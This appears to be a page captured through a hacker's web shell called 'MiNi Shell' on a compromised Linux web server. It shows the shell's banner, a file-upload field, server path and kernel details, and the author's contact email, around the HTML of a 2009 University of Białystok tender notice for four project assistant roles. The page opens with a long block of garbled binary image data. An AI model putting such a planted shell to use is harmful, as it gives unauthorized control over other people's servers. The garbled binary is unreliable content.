JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/63549-N-2009.html

<p class="kh_header"><b>Białystok: Usługa pełnienia funkcji  asystenta ds. kontaktów z przedsiębiorcami ; asystenta ds. studiów podyplomowych; asystenta ds. szkoleń; sekretarza ds. studiów podyplomowych projektu Dydaktyka i praktyka kluczem do przyszłości współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego Program Operacyjny Kapita ł Ludzki 2007-2013 Priorytet IV. Szkolnictwo Wyższe i Nauka, Poddziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni - Dzp-23/U/2009</b><br>
<b>Numer ogłoszenia: 63549 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet w Białymstoku , ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, woj. podlaskie, tel. 085 7457117, faks 085 745 70 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa pełnienia funkcji  asystenta ds. kontaktów z przedsiębiorcami ; asystenta ds. studiów podyplomowych; asystenta ds. szkoleń; sekretarza ds. studiów podyplomowych projektu Dydaktyka i praktyka kluczem do przyszłości współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego Program Operacyjny Kapita ł Ludzki 2007-2013 Priorytet IV. Szkolnictwo Wyższe i Nauka, Poddziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni - Dzp-23/U/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa pełnienia funkcji  asystenta ds. kontaktów z przedsiębiorcami ; asystenta ds. studiów podyplomowych; asystenta ds. szkoleń; sekretarza ds. studiów podyplomowych projektu  Dydaktyka i praktyka kluczem do przyszłości (oznaczenie postępowania  zgodnie z Opisem przedmiotu zamówienia stanowiącym pkt. 3 SIWZ 
Zakres zamówienia poniżej 206 000 tys. euro.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp, a w szczególności:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi 
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, określonej jako możliwość dysponowania lub dostępu do środków finansowych wystarczających do realizacji zamówienia bez udzielania zaliczki, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
oraz w przypadku części 1 posiadają poniższe kwalifikacje:
a)	posiadają stopień doktora nauk ekonomicznych z zakresu ekonomii lub zarządzania,
b)	posiadają doświadczenie na stanowisku związanym z organizacją i nadzorowaniem procesu dydaktycznego na wyższej uczelni,
c)	posiadają doświadczenie w zarządzaniu projektami łączącymi działalność dydaktyczną uczelni z praktyką gospodarczą,
d)	posiadają doświadczenie dydaktyczne na studiach podyplomowych,
oraz w przypadku części 2 posiadają poniższe kwalifikacje:
a)	posiadają stopień doktora nauk ekonomicznych z zakresu ekonomii lub zarządzania,
b)	posiadają ukończony kurs doskonalenia pedagogicznego lub podyplomowe studia z zakresu doskonalenia pedagogicznego dla nauczycieli akademickich,
c)	wykażą się min. 5-letnim doświadczeniem dydaktycznym w zakresie edukacji akademickiej,
d)	wykażą się doświadczeniem dydaktycznym w zakresie prowadzenia zajęć na studiach podyplomowych lub kierowaniem studiami podyplomowymi,
e)	wykażą się doświadczeniem w pracach komisji ds. obron dyplomowych
oraz w przypadku części 3 posiadają poniższe kwalifikacje:
a)	posiadają stopień doktora nauk ekonomicznych z zakresu ekonomii lub zarządzania
b)	posiadają wykształcenie wyższe matematyczne;
c)	posiadają przygotowanie pedagogiczne dla nauczycieli akademickich;
d)	wykażą się minimum 5 letnim doświadczeniem dydaktycznym w zakresie edukacji akademickiej z przedmiotów wykorzystujących matematykę w ekonomii np. statystyka, ekonomia mat.;
oraz w przypadku części 4 posiadają poniższe kwalifikacje:
a)	ukończyły studia  z zakresu  administracji 
b)	co najmniej 8 letni staż pracy,
c)	co najmniej 6-letnie doświadczenie w pracy w zakresie obsługi studentów, słuchaczy studiów podyplomowych, prowadzenia dokumentacji przebiegu studiów,
d)	znajomość pakietu MS OFFICE
Sposób oceny spełnienia warunków:
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, 
o których mowa w pkt 6 SIWZ, dołączonych do oferty wg formuły spełnia - nie spełnia. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. Uzupełnienie wymaganych dokumentów będzie możliwe po upływie terminu składania ofert, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.
Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy):.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA:
1)	oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-3 uPzp (wg załączonego wzoru druku - zał. nr 3 do SIWZ), 
2)	oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 uPzp (wg załączonego wzoru druku - zał. nr 2 do SIWZ), 
DOKUMENTY:
1)	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 uPzp, Zamawiający żąda złożenia:
- aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności 
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności
gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  (Wykonawcy będący osobami fizycznymi, które nie prowadzą działalności gospodarczej nie są zobowiązani do składania tego dokumentu).
2)	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy 
i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  Zamawiający żąda:
-	wykazu osób (osoby), które (a) będą wykonywać zamówienie wraz z informacjami  na temat ich kwalifikacji  
i posiadanego doświadczenia (na przykład kserokopie posiadanych uprawnień, dokumentów potwierdzających wykształcenie, zaświadczeń o posiadanym doświadczeniu, dokumentów poświadczających kwalifikacje) 
- zał. nr 4 do SIWZ.
3)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6 DOKUMENTY ppkt 1 składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania 
nie wydaje się dokumentu lub dokumentów potwierdzających odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5)	Wykonawca składa wszystkie dokumenty w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez Wykonawcę.
6)	Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, tłumaczenie musi być poświadczone przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet w Białymstoku, Wydział Ekonomii i Zarządzania, ul. Warszawska 63, 15-062 Białystok, piętro II, pok. 305.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 09:30, miejsce: Uniwersytet w Białymstoku, Kancelaria Ogólna, ul. M. Skłodowskiej-Curie 14, 15-097 Białystok,      piętro X, pok. 1008.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy projektu  Dydaktyka i praktyka kluczem do przyszłości współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego Program Operacyjny Kapita ł Ludzki 2007-2013 Priorytet IV. Szkolnictwo Wyższe i Nauka, Poddziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługa pełnienia funkcji asystenta ds. kontaktów z przedsiębiorcami.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rekrutacja studentów na staże
organizacja staży studenckich w przedsiębiorstwach
nadzór nad przebiegiem staży 
nawiązanie współpracy z przedsiębiorcami
organizacja zajęć dydaktycznych prowadzonych przez praktyków gospodarczych na 8 kierunkach studiów podyplomowych
organizacja warsztatów prowadzonych przez praktyków gospodarczych na studiach stacjonarnych I stopnia
organizacja logistyczno-techniczna zajęć dydaktycznych
prowadzenie dokumentacji związanej z wyżej wymienionymi zadaniami
bieżąca współpraca z personelem realizującym zadania w projekcie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługa pełnienia funkcji asystenta ds. studiów podyplomowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rekrutacja kadry dydaktycznej na  8 kierunków studiów podyplomowych 
przygotowanie informacji do prasy o rekrutacji na studia podyplomowe
rekrutacja i selekcja słuchaczy na 8 kierunków studiów podyplomowych
opracowanie ramowego programu przedmiotów wraz z liczną godzin
nadzór formalno-merytoryczny nad realizacją programu studiów
ustalanie harmonogramów zjazdów
kontakty z kadrą dydaktyczną
nadzór nad dokumentacją zadania
organizacja i udział w obronie pracy dyplomowej
przygotowanie raportów z zakończenia poszczególnych edycji studiów
bieżąca współpraca z personelem realizującym zadania w projekcie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> usługa pełnienia funkcji asystenta ds. szkoleń.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rekrutacja kadry dydaktycznej do zajęć z matematyki
rekrutacja studentów I roku kierunku Ekonomia i Zarządzanie na dodatkowe zajęcia z matematyki
organizacja logistyczno-techniczna zajęć wyrównawczych z matematyki
merytoryczny nadzór nad przygotowaniem i realizacją zajęć
rekrutacja kadry dydaktycznej do szkoleń kadry akademickiej
rekrutacja kadry akademickiej 
organizacja szkoleń kadry dydaktycznej
merytoryczny nadzór nad przygotowaniem i realizacją szkoleń
organizacja logistyczno-techniczna szkoleń
bieżąca współpraca z personelem realizującym zadania w projekcie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> usługa pełnienia funkcji sekretarza ds. studiów podyplomowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> techniczna obsługa 8 kierunków studiów podyplomowych - powielanie i dystrybucja materiałów szkoleniowych, przygotowanie sprzętu
kontrola przebiegu poszczególnych zajęć
bieżące kontakty ze słuchaczami i dydaktykami
obsługa biura projektu w weekendy zjazdowe 
kompletowanie dokumentacji BO oraz praca biurowa związana z realizacją studiów (zestawienia, bazy danych, prowadzenie dokumentacji słuchaczy, kart słuchaczy, wypisywanie świadectw etc.)
bieżąca współpraca z personelem realizującym zadania w projekcie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com